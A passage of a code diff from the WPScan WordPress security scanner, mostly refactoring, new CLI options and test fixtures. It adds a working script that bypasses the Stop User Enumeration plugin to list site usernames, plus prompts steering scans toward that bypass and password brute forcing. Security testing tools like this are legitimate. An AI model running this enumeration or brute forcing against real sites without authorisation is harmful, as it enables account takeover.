     s  = "#{id}"
-    s += " | #{login}" if login
-    s += " | #{display_name}" if display_name
+    s << " | #{login}" if login
+    s << " | #{display_name}" if display_name
     s
   end
 

lib/common/models/wp_version/findable.rb

@@ -190,8 +190,6 @@ class WpVersion < WpItem
 
     # Attempts to find the WordPress version from the sitemap.xml file.
     #
-    # See: http://code.google.com/p/wpscan/issues/detail?id=109
-    #
     # @param [ URI ] target_uri
     #
     # @return [ String ] The version number

lib/common/typhoeus_cache.rb

@@ -2,25 +2,14 @@
 
 require 'common/cache_file_store'
 
-# Implementaion of a cache_key (Typhoeus::Request#hash has too many options)
-module Typhoeus
-  class Request
-    module Cacheable
-      def cache_key
-        Digest::SHA2.hexdigest("#{url}-#{options[:body]}-#{options[:method]}")[0..32]
-      end
-    end
-  end
-end
-
 class TyphoeusCache < CacheFileStore
 
   def get(request)
-    read_entry(request.cache_key)
+    read_entry(request.hash.to_s)
   end
 
   def set(request, response)
-    write_entry(request.cache_key, response, request.cache_ttl)
+    write_entry(request.hash.to_s, response, request.cache_ttl)
   end
 
 end

lib/wpscan/web_site.rb

@@ -32,7 +32,7 @@ class WebSite
 
   def has_xml_rpc?
     response = Browser.get_and_follow_location(xml_rpc_url)
-    response.body =~ %r{XML-RPC server accepts POST requests only}i    
+    response.body =~ %r{XML-RPC server accepts POST requests only}i
   end
 
   # See http://www.hixie.ch/specs/pingback/pingback-1.0#TOC2.3
@@ -71,7 +71,7 @@ class WebSite
   #
   # @return [ String ] The MD5 hash of the page
   def self.page_hash(page)
-    page = Browser.get(page) unless page.is_a?(Typhoeus::Response)
+    page = Browser.get(page, { followlocation: true, cache_ttl: 0 }) unless page.is_a?(Typhoeus::Response)
 
     Digest::MD5.hexdigest(page.body.gsub(/<!--.*?-->/m, ''))
   end

lib/wpscan/wp_target.rb

@@ -29,6 +29,7 @@ class WpTarget < WebSite
     @multisite      = nil
 
     Browser.instance(options.merge(:max_threads => options[:threads]))
+    Browser.instance.referer = url
   end
 
   # check if the target website is
@@ -38,6 +39,11 @@ class WpTarget < WebSite
 
     response = Browser.get_and_follow_location(@uri.to_s)
 
+    # Note: in the future major WPScan version, change the user-agent to see
+    # if the response is a 200 ?
+    fail "The target is responding with a 403, this might be due to a WAF or a plugin\n" \
+          'You should try to supply a valid user-agent via the --user-agent option' if response.code == 403
+
     if response.body =~ /["'][^"']*\/wp-content\/[^"']*["']/i
       wordpress = true
     else
@@ -93,7 +99,7 @@ class WpTarget < WebSite
   end
   # :nocov:
 
-  # The version is not yet considerated
+  # The version is not yet considered
   #
   # @param [ String ] name
   # @param [ String ] version

lib/wpscan/wp_target/wp_login_protection.rb

@@ -12,7 +12,6 @@ class WpTarget < WebSite
     end
 
     # Checks if a login protection plugin is enabled
-    # http://code.google.com/p/wpscan/issues/detail?id=111
     # return a WpPlugin object or nil if no one is found
     def login_protection_plugin
       unless @login_protection_plugin

lib/wpscan/wpscan_helper.rb

@@ -83,6 +83,8 @@ def help
   puts '--exclude-content-based "<regexp or string>" Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied'
   puts '                                             You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)'
   puts '--config-file | -c <config file> Use the specified config file'
+  puts '--user-agent | -a <User-Agent> Use the specified User-Agent'
+  puts '--random-agent | -r Use a random User-Agent'
   puts '--follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not'
   puts '--wp-content-dir <wp content dir>  WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed'
   puts '--wp-plugins-dir <wp plugins dir>  Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed'
@@ -93,7 +95,12 @@ def help
   puts '--wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute.'
   puts '--threads  | -t <number of threads>  The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)'
   puts '--username | -U <username>  Only brute force the supplied username.'
+  puts '--cache-ttl <cache-ttl>  Typhoeus cache TTL'
+  puts '--request-timeout <request-timeout>  Request Timeout'
+  puts '--connect-timeout <connect-timeout>  Connect Timeout'
+  puts '--max-threads <max-threads>  Maximum Threads'
   puts '--help     | -h This help screen.'
   puts '--verbose  | -v Verbose output.'
+  puts '--batch Never ask for user input, use the default behaviour.'
   puts
 end

lib/wpscan/wpscan_options.rb

@@ -3,6 +3,7 @@
 class WpscanOptions
 
   ACCESSOR_OPTIONS = [
+    :batch,
     :enumerate_plugins,
     :enumerate_only_vulnerable_plugins,
     :enumerate_all_plugins,
@@ -30,7 +31,13 @@ class WpscanOptions
     :exclude_content_based,
     :basic_auth,
     :debug_output,
-    :version
+    :version,
+    :user_agent,
+    :random_agent,
+    :cache_ttl,
+    :request_timeout,
+    :connect_timeout,
+    :max_threads
   ]
 
   attr_accessor *ACCESSOR_OPTIONS
@@ -136,6 +143,10 @@ class WpscanOptions
     !to_h.empty?
   end
 
+  def random_agent=(useless)
+    @user_agent = get_random_user_agent
+  end
+
   # return Hash
   def to_h
     options = {}
@@ -227,6 +238,8 @@ class WpscanOptions
       ['--wordlist', '-w', GetoptLong::REQUIRED_ARGUMENT],
       ['--threads', '-t', GetoptLong::REQUIRED_ARGUMENT],
       ['--force', '-f', GetoptLong::NO_ARGUMENT],
+      ['--user-agent', '-a', GetoptLong::REQUIRED_ARGUMENT],
+      ['--random-agent', '-r', GetoptLong::NO_ARGUMENT],
       ['--help', '-h', GetoptLong::NO_ARGUMENT],
       ['--verbose', '-v', GetoptLong::NO_ARGUMENT],
       ['--proxy', GetoptLong::REQUIRED_ARGUMENT],
@@ -239,7 +252,12 @@ class WpscanOptions
       ['--exclude-content-based', GetoptLong::REQUIRED_ARGUMENT],
       ['--basic-auth', GetoptLong::REQUIRED_ARGUMENT],
       ['--debug-output', GetoptLong::NO_ARGUMENT],
-      ['--version', GetoptLong::NO_ARGUMENT]
+      ['--version', GetoptLong::NO_ARGUMENT],
+      ['--cache-ttl', GetoptLong::REQUIRED_ARGUMENT],
+      ['--request-timeout', GetoptLong::REQUIRED_ARGUMENT],
+      ['--connect-timeout', GetoptLong::REQUIRED_ARGUMENT],
+      ['--max-threads', GetoptLong::REQUIRED_ARGUMENT],
+      ['--batch', GetoptLong::NO_ARGUMENT]
     )
   end
 

lib/wpstools/plugins/checker/checker_plugin.rb

@@ -32,10 +32,12 @@ class CheckerPlugin < Plugin
       xml = xml(vuln_ref_file)
 
       urls = []
-      xml.xpath('//reference').each { |node| urls << node.text }
+      xml.xpath('//references/url').each { |node| urls << node.text }
 
       urls.uniq!
 
+      puts "[!] No URLs found in #{vuln_ref_file}!" if urls.empty?
+
       dead_urls       = []
       queue_count     = 0
       request_count   = 0

lib/wpstools/plugins/stats/stats_plugin.rb

@@ -20,7 +20,6 @@ class StatsPlugin < Plugin
 
       puts "WPScan Database Statistics:"
       puts "---------------------------"
-      puts "[#] Total WordPress Sites in the World: #{get_wp_installations}"
       puts
       puts "[#] Total vulnerable versions: #{vuln_core_count}"
       puts "[#] Total vulnerable plugins:  #{vuln_plugin_count}"
@@ -79,9 +78,4 @@ class StatsPlugin < Plugin
     IO.readlines(file).size
   end
 
-  def get_wp_installations()
-    page = Nokogiri::HTML(Typhoeus.get('http://en.wordpress.com/stats/').body)
-    page.css('span[class="stats-flipper-number"]').text
-  end
-
 end

spec/lib/common/browser_spec.rb

@@ -6,9 +6,9 @@ describe Browser do
   it_behaves_like 'Browser::Actions'
   it_behaves_like 'Browser::Options'
 
-  CONFIG_FILE_WITHOUT_PROXY       = SPEC_FIXTURES_CONF_DIR + '/browser/browser.conf.json'
-  CONFIG_FILE_WITH_PROXY          = SPEC_FIXTURES_CONF_DIR + '/browser/browser.conf_proxy.json'
-  #CONFIG_FILE_WITH_PROXY_AND_AUTH = SPEC_FIXTURES_CONF_DIR + '/browser/browser.conf_proxy_auth.json'
+  CONFIG_FILE_WITHOUT_PROXY       = SPEC_FIXTURES_CONF_DIR + '/browser.conf.json'
+  CONFIG_FILE_WITH_PROXY          = SPEC_FIXTURES_CONF_DIR + '/browser.conf_proxy.json'
+  #CONFIG_FILE_WITH_PROXY_AND_AUTH = SPEC_FIXTURES_CONF_DIR + '/browser.conf_proxy_auth.json'
 
   subject(:browser) {
     Browser.reset
@@ -16,14 +16,13 @@ describe Browser do
   }
   let(:options) { {} }
   let(:instance_vars_to_check) {
-    ['user_agent', 'user_agent_mode', 'available_user_agents', 'proxy',
-     'max_threads', 'cache_ttl', 'request_timeout', 'connect_timeout']
+    ['proxy', 'max_threads', 'cache_ttl', 'request_timeout', 'connect_timeout']
   }
   let(:json_config_without_proxy) { JSON.parse(File.read(CONFIG_FILE_WITHOUT_PROXY)) }
   let(:json_config_with_proxy)    { JSON.parse(File.read(CONFIG_FILE_WITH_PROXY)) }
 
   def check_instance_variables(browser, json_expected_vars)
-    json_expected_vars['max_threads'] ||= 1 # max_thread can not be nil
+    json_expected_vars['max_threads'] ||= 20 # max_thread can not be nil
 
     instance_vars_to_check.each do |variable_name|
       browser.send(:"#{variable_name}").should === json_expected_vars[variable_name]
@@ -39,12 +38,6 @@ describe Browser do
   describe '::instance' do
     after { check_instance_variables(browser, @json_expected_vars) }
 
-    context "when default config_file = #{CONFIG_FILE_WITHOUT_PROXY}" do
-      it 'will check the instance vars' do
-        @json_expected_vars = json_config_without_proxy
-      end
-    end
-
     context "when :config_file = #{CONFIG_FILE_WITH_PROXY}" do
       let(:options) { { config_file: CONFIG_FILE_WITH_PROXY } }
 
@@ -138,12 +131,13 @@ describe Browser do
         ssl_verifypeer: false, ssl_verifyhost: 0,
         cookiejar: cookie_jar, cookiefile: cookie_jar,
         timeout: 2000, connecttimeout: 1000,
-        maxredirs: 3
+        maxredirs: 3,
+        referer: nil
       }
     }
 
     after :each do
-      browser.stub(user_agent: 'SomeUA')
+      browser.user_agent = 'SomeUA'
       browser.cache_ttl = 250
 
       browser.merge_request_params(params).should == @expected

spec/lib/common/version_compare_spec.rb

@@ -31,6 +31,11 @@ describe 'VersionCompare' do
         @version1 = '0'
         @version2 = '1'
       end
+
+      it 'returns true' do
+        @version1 = '0.4.2b'
+        @version2 = '2.3.3'
+      end
     end
 
     context 'version checked is older' do

spec/lib/wpscan/web_site_spec.rb

@@ -12,7 +12,7 @@ describe 'WebSite' do
   before :all do
     Browser::reset
     Browser.instance(
-      config_file: SPEC_FIXTURES_CONF_DIR + '/browser/browser.conf.json',
+      config_file: SPEC_FIXTURES_CONF_DIR + '/browser.conf.json',
       cache_ttl: 0
     )
   end

spec/lib/wpscan/wp_target_spec.rb

@@ -9,7 +9,7 @@ describe WpTarget do
   let(:login_url)     { wp_target.uri.merge('wp-login.php').to_s }
   let(:options)       {
     {
-      config_file:    SPEC_FIXTURES_CONF_DIR + '/browser/browser.conf.json',
+      config_file:    SPEC_FIXTURES_CONF_DIR + '/browser.conf.json',
       cache_ttl:      0,
       wp_content_dir: 'wp-content',
       wp_plugins_dir: 'wp-content/plugins'
@@ -97,6 +97,14 @@ describe WpTarget do
         wp_target.should_not be_wordpress
       end
     end
+
+    context 'when the response is a 403' do
+      before { stub_request(:any, /.*/).to_return(status: 403) }
+
+      it 'raises an error' do
+        expect { wp_target.wordpress? }.to raise_error
+      end
+    end
   end
 
   describe '#wordpress_hosted?' do

spec/samples/conf/browser.conf.json

@@ -0,0 +1,7 @@
+{
+    "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
+    "cache_ttl": 600,
+    "request_timeout": 2000,
+    "connect_timeout": 1000,
+    "max_threads": 20
+}

spec/samples/conf/browser.conf_proxy.json

@@ -0,0 +1,7 @@
+{
+    "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:10.0) Gecko/20100101 Firefox/11.0",
+    "proxy": "127.0.0.1:3038",
+    "cache_ttl": 300,
+    "request_timeout": 2000,
+    "connect_timeout": 1000
+}

spec/samples/conf/browser.conf_proxy_auth.json

@@ -0,0 +1,8 @@
+{
+    "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:10.0) Gecko/20100101 Firefox/11.0",
+    "proxy": "127.0.0.1:3038",
+    "proxy_auth": "user:pass",
+    "cache_ttl": 300,
+    "request_timeout": 2000,
+    "connect_timeout": 1000
+}

spec/samples/conf/browser/browser.conf.json

@@ -1,8 +0,0 @@
-{
-  "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
-  "user_agent_mode": "static",
-  "cache_ttl": 300,
-  "request_timeout": 2000,
-  "connect_timeout": 1000,
-  "max_threads": 5
-}

spec/samples/conf/browser/browser.conf_proxy.json

@@ -1,8 +0,0 @@
-{
-  "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:10.0) Gecko/20100101 Firefox/11.0",
-  "user_agent_mode": "static",
-  "proxy": "127.0.0.1:3038",
-  "cache_ttl": 300,
-  "request_timeout": 2000,
-  "connect_timeout": 1000
-}

spec/samples/conf/browser/browser.conf_proxy_auth.json

@@ -1,9 +0,0 @@
-{
-  "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:10.0) Gecko/20100101 Firefox/11.0",
-  "user_agent_mode": "static",
-  "proxy": "127.0.0.1:3038",
-  "proxy_auth": "user:pass",
-  "cache_ttl": 300,
-  "request_timeout": 2000,
-  "connect_timeout": 1000
-}

spec/shared_examples/browser/options.rb

@@ -71,69 +71,6 @@ shared_examples 'Browser::Options' do
     end
   end
 
-  describe '#user_agent_mode= & #user_agent_mode' do
-    # Testing all valid modes
-    Browser::USER_AGENT_MODES.each do |user_agent_mode|
-      it "sets & returns #{user_agent_mode}" do
-        browser.user_agent_mode = user_agent_mode
-        browser.user_agent_mode.should === user_agent_mode
-      end
-    end
-
-    it 'sets the mode to "static" if nil is given' do
-      browser.user_agent_mode = nil
-      browser.user_agent_mode.should === 'static'
-    end
-
-    it 'raises an error if the mode is not valid' do
-      expect { browser.user_agent_mode = 'invalid-mode' }.to raise_error
-    end
-  end
-
-  describe '#user_agent= & #user_agent' do
-    let(:available_user_agents) { %w{ ua-1 ua-2 ua-3 ua-4 ua-6 ua-7 ua-8 ua-9 ua-10 ua-11 ua-12 ua-13 ua-14 ua-15 ua-16 ua-17 } }
-
-    context 'when static mode' do
-      it 'returns the same user agent' do
-        browser.user_agent      = 'fake UA'
-        browser.user_agent_mode = 'static'
-
-        (1..3).each do
-          browser.user_agent.should === 'fake UA'
-        end
-      end
-    end
-
-    context 'when semi-static mode' do
-      it 'chooses a random user_agent in the available_user_agents array and always return it' do
-        browser.available_user_agents = available_user_agents
-        browser.user_agent            = 'Firefox 11.0'
-        browser.user_agent_mode       = 'semi-static'
-
-        user_agent = browser.user_agent
-        user_agent.should_not === 'Firefox 11.0'
-        available_user_agents.include?(user_agent).should be_true
-
-        (1..3).each do
-          browser.user_agent.should === user_agent
-        end
-      end
-    end
-
-    context 'when random' do
-      it 'returns a random user agent each time' do
-        browser.available_user_agents = available_user_agents
-        browser.user_agent_mode       = 'random'
-
-        ua_1 = browser.user_agent
-        ua_2 = browser.user_agent
-        ua_3 = browser.user_agent
-
-        fail if ua_1 === ua_2 and ua_2 === ua_3
-      end
-    end
-  end
-
   describe 'proxy=' do
     let(:exception) { 'Invalid proxy format. Should be [protocol://]host:port.' }
 
@@ -185,7 +122,7 @@ shared_examples 'Browser::Options' do
         end
 
         context 'valid format' do
-           it 'sets the auth' do
+          it 'sets the auth' do
             @proxy_auth = 'username:passwd'
             @expected   = @proxy_auth
           end

spec/shared_examples/wp_target/wp_readme.rb

@@ -27,7 +27,6 @@ shared_examples 'WpTarget::WpReadme' do
       @expected = true
     end
 
-    # http://code.google.com/p/wpscan/issues/detail?id=108
     it 'returns true even if the readme.html is not in english' do
       @stub     = { status: 200, body: File.new(fixtures_dir + '/readme-3.3.2-fr.html') }
       @expected = true

spec/spec_helper.rb

@@ -15,7 +15,7 @@ SPEC_FIXTURES_CONF_DIR        = SPEC_FIXTURES_DIR + '/conf' # FIXME Remove it
 SPEC_FIXTURES_WP_VERSIONS_DIR = SPEC_FIXTURES_DIR + '/wp_versions'
 
 redefine_constant(:CACHE_DIR, SPEC_DIR + '/cache')
-redefine_constant(:CONF_DIR, SPEC_FIXTURES_DIR + '/conf/browser') # FIXME Remove the /browser
+redefine_constant(:CONF_DIR, SPEC_FIXTURES_DIR + '/conf')
 
 MODELS_FIXTURES = SPEC_FIXTURES_DIR + '/common/models'
 COLLECTIONS_FIXTURES = SPEC_FIXTURES_DIR + '/common/collections'

stop_user_enumeration_bypass.rb

@@ -0,0 +1,73 @@
+#!/usr/bin/env ruby
+# encoding: UTF-8
+#
+#
+# Script based on http://seclists.org/fulldisclosure/2014/Feb/3
+
+require File.join(File.dirname(__FILE__), 'lib/wpscan/wpscan_helper')
+
+@opts = {
+  ids: 1..10,
+  verbose: false,
+  user_agent: 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0'
+}
+
+parser = OptionParser.new('Usage: ./stop_user_enumeration_bypass.rb <Target URL> [options]', 35) do |opts|
+  opts.on('--proxy PROXY', 'Proxy to use') do |proxy|
+    @opts[:proxy] = proxy
+  end
+
+  opts.on('--auth Username:Password', 'Credentials to use if Basic/NTLM auth') do |creds|
+    @opts[:creds] = creds
+  end
+
+  opts.on('--ids START-END', 'The ids to check, default is 1-10') do |ids|
+    @opts[:ids] = Range.new(*ids.split('-').map(&:to_i))
+  end
+
+  opts.on('--user-agent UA', 'The user-agent to use') do |ua|
+    @opts[:user_agent] = ua
+  end
+
+  opts.on('--verbose', '-v', 'Verbose Mode') do
+    @opts[:verbose] = true
+  end
+end
+
+begin
+  parser.parse!
+
+  fail "#{red('The target URL must be supplied')}\n\n#{parser}" unless ARGV[0]
+
+  uri = URI.parse(add_trailing_slash(add_http_protocol(ARGV[0])))
+
+  request_params = {
+    proxy: @opts[:proxy],
+    userpwd: @opts[:creds],
+    headers: { 'User-Agent' => @opts[:user_agent] },
+    followlocation: true,
+    ssl_verifypeer: false,
+    ssl_verifyhost: 2
+  }
+
+  detected_users = WpUsers.new
+
+  @opts[:ids].each do |user_id|
+    user = WpUser.new(uri, id: user_id)
+
+    if user.exists_from_response?(Typhoeus.post(uri, request_params.merge(body: { author: user_id })))
+      detected_users << user
+    end
+  end
+
+  puts 'Usernames found:'
+  detected_users.output
+rescue => e
+  puts e.message
+
+  if @opts[:verbose]
+    puts red('Trace:')
+    puts red(e.backtrace.join("\n"))
+  end
+  exit(1)
+end

wpscan.rb

@@ -63,22 +63,24 @@ def main
       end
     end
 
-    redirection = wp_target.redirection
-    if redirection
+    if (redirection = wp_target.redirection)
       if wpscan_options.follow_redirection
         puts "Following redirection #{redirection}"
-        puts
       else
-        puts "The remote host tried to redirect us to: #{redirection}"
-        print 'Do you want follow the redirection ? [y/n] '
+        puts "The remote host redirects to: #{redirection}"
+        puts '[?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N]'
       end
 
-      if wpscan_options.follow_redirection or Readline.readline =~ /^y/i
-        wpscan_options.url = redirection
-        wp_target = WpTarget.new(redirection, wpscan_options.to_h)
-      else
-        puts 'Scan aborted'
-        exit(0)
+      if wpscan_options.follow_redirection || !wpscan_options.batch
+        if wpscan_options.follow_redirection || (input = Readline.readline) =~ /^y/i
+          wpscan_options.url = redirection
+          wp_target = WpTarget.new(redirection, wpscan_options.to_h)
+        else
+          if input =~ /^a/i
+            puts 'Scan aborted'
+            exit(0)
+          end
+        end
       end
     end
 
@@ -100,8 +102,8 @@ def main
     unless wp_target.wp_plugins_dir_exists?
       puts "The plugins directory '#{wp_target.wp_plugins_dir}' does not exist."
       puts 'You can specify one per command line option (don\'t forget to include the wp-content directory if needed)'
-      print 'Continue? [y/n] '
-      unless Readline.readline =~ /^y/i
+      puts '[?] Continue? [Y]es [N]o, default: [N]'
+      if wpscan_options.batch || Readline.readline !~ /^y/i
         exit(0)
       end
     end
@@ -148,7 +150,7 @@ def main
     wp_target.interesting_headers.each do |header|
       output = "#{green('[+]')} Interesting header: "
 
-      if header[1].class == Array 
+      if header[1].class == Array
         header[1].each do |value|
           puts output + "#{header[0]}: #{value}"
         end
@@ -294,6 +296,11 @@ def main
       puts
       puts "#{green('[+]')} Enumerating usernames ..."
 
+      if wp_target.has_plugin?('stop-user-enumeration')
+        puts "#{red('[!]')} Stop User Enumeration plugin detected, results might be empty. " \
+             "However a bypass exists, see stop_user_enumeration_bypass.rb in #{File.expand_path(File.dirname(__FILE__))}"
+      end
+
       wp_users = WpUsers.aggressive_detection(wp_target,
         enum_options.merge(
           range: wpscan_options.enumerate_usernames_range,
@@ -327,12 +334,12 @@ def main
         protection_plugin = wp_target.login_protection_plugin()
 
         puts
-        puts "The plugin #{protection_plugin.name} has been detected. It might record the IP and timestamp of every failed login and/or prevent brute forcing altogether. Not a good idea for brute forcing!"
-        print "[?] Do you want to start the brute force anyway ? [y/n] "
+        puts "#{red('[!]')} The plugin #{protection_plugin.name} has been detected. It might record the IP and timestamp of every failed login and/or prevent brute forcing altogether. Not a good idea for brute forcing!"
+        puts '[?] Do you want to start the brute force anyway ? [Y]es [N]o, default: [N]'
 
-        bruteforce = false if Readline.readline !~ /^y/i
+        bruteforce = false if wpscan_options.batch || Readline.readline !~ /^y/i
       end
-      puts
+
       if bruteforce
         puts "#{green('[+]')} Starting the password brute forcer"
 
@@ -347,14 +354,14 @@ def main
           wp_users.output(show_password: true, margin_left: ' ' * 2)
         end
       else
-        puts "Brute forcing aborted"
+        puts "#{red('[!]')} Brute forcing aborted"
       end
     end
 
     stop_time   = Time.now
     elapsed     = stop_time - start_time
     used_memory = get_memory_usage - start_memory
-    
+
     puts
     puts green("[+] Finished: #{stop_time.asctime}")
     puts green("[+] Memory used: #{used_memory.bytes_to_human}")
@@ -362,13 +369,13 @@ def main
     exit(0) # must exit!
 
   rescue SystemExit, Interrupt
-    
+
   rescue => e
-    if e.backtrace[0] =~ /main/
-      puts red(e.message)
-    else
-      puts red("[ERROR] #{e.message}")
-      puts red("Trace:")
+    puts
+    puts red(e.message)
+
+    if wpscan_options && wpscan_options.verbose
+      puts red('Trace:')
       puts red(e.backtrace.join("\n"))
     end
     exit(1)